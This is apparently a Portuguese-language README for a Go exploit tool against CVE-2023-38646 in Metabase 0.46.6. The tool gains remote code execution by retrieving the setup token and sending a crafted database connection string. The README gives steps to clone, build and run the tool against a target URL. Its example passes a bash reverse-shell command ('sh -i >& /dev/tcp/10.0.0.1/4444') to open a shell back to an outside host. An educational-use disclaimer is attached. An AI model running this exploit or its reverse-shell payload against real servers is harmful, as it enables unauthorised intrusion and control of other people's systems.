
Exploit para CVE-2023-38646 no Metabase 0.46.6, permitindo execução remota de código por meio de requisições elaboradas e recuperação do token de configuração.
Exploit para Metabase 0.46.6 CVE-2023-38646
Esta ferramenta explora uma vulnerabilidade (CVE-2023-38646) em uma plataforma de software. O exploit permite execução remota de código por meio de uma solicitação manipulada, aproveitando uma string de conexão de banco de dados tratada incorretamente.
A ferramenta:
Clone o repositório:
git clone https://github.com/SUT0L/CVE-2023-38646.git
cd CVE-2023-38646
go build -o exploit
chmod +x exploit
./exploit --url [TARGET_URL] --command [COMMAND] [--proxy PROXY_URL]
TARGET_URL: A URL da plataforma a ser verificada e explorada. COMMAND: O comando a ser executado no alvo. PROXY_URL (Opcional): A URL do servidor proxy (ex.: http://127.0.0.1:8080). Se não for fornecida, nenhum proxy será usado.
./exploit --url https://example.com --command 'sh -i >& /dev/tcp/10.0.0.1/4444 0>&1' --proxy http://127.0.0.1:8080
Esta ferramenta destina-se apenas a fins educacionais e de pesquisa. Sempre garanta que você tenha autorização adequada antes de verificar ou explorar qualquer alvo. O uso indevido desta ferramenta é estritamente contra a intenção do desenvolvedor e pode ser ilegal.
Sinta-se à vontade para abrir issues para qualquer feedback, bugs ou solicitações de recursos. Pull requests são sempre bem-vindos!